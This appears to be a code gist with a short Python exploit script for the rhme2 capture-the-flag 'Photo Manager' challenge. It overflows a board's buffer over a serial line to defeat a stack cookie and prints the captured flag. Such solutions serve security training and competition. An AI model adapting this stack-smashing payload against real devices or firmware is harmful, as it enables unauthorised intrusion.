@53845714nF
Last active February 17, 2024 18:16
Fast exploit for the rhme2 CTF. For the challenge Photo Manager. Written in Python3. Breaks a stack cookie.
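#!/usr/bin/env python3
import serial
import time

# Open the serial connection to the board; stop here if the port is missing,
# otherwise every later call would fail on an undefined `arduino`.
try:
    arduino = serial.Serial('/dev/ttyUSB0', 19200, timeout=0.1)
except serial.SerialException:
    print('Port not found')
    raise SystemExit(1)


def read_until(until):
    """Accumulate serial output until the marker string `until` appears."""
    arduino_data = ''
    while until not in arduino_data:
        # str() of the bytes object keeps the b'...' representation; the
        # marker checks and the split index below rely on that form.
        arduino_data += str(arduino.readline())
    return arduino_data


# read the used memory
read_until('[2] Memory management')
arduino.write(str.encode('2\r'))
used_memory = read_until('Memory space used:').split(' ')[7]

# go back to the menu, pick option 1 and wait for its input prompt
read_until('[2] Memory management')
arduino.write(str.encode('1\r'))
read_until('[A-Z/a-z/0-9]')

# send the payload: padding sized from the reported used memory,
# followed by the two trailing bytes and a carriage return
arduino.write(str.encode('A' * (4096 - int(used_memory) - 8) + chr(4088 - int(used_memory))))
arduino.write(b"\xff")
arduino.write(str.encode('\r'))
print(read_until('[2] Memory management'))

# Flag shows with the keyword: FLAG
# In my case: FLAG:D1d_y0u_sm4sh_my_stack_bro?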